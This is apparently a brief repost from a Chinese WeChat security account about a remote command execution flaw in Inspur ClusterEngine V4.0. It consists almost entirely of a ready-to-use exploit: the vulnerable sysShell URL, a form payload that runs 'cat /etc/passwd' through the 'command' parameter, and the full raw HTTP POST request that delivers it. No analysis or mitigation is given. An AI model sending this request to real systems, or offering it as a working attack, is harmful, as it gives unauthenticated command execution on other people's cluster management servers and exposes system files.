https://x.x.x.x/
https://x.x.x.x/sysShell
op=doPlease&node=cu01&command=cat /etc/passwd
POST /sysShell HTTP/1.1Connection: closeContent-Length: 49Cache-Control: max-age=0Upgrade-Insecure-Requests: 1DNT: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9op=doPlease&node=cu01&command=cat+%2Fetc%2Fpasswd
本文始发于微信公众号(进德修业行道):浪潮ClusterEngineV4.0 sysShell 远程命令执行漏洞
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论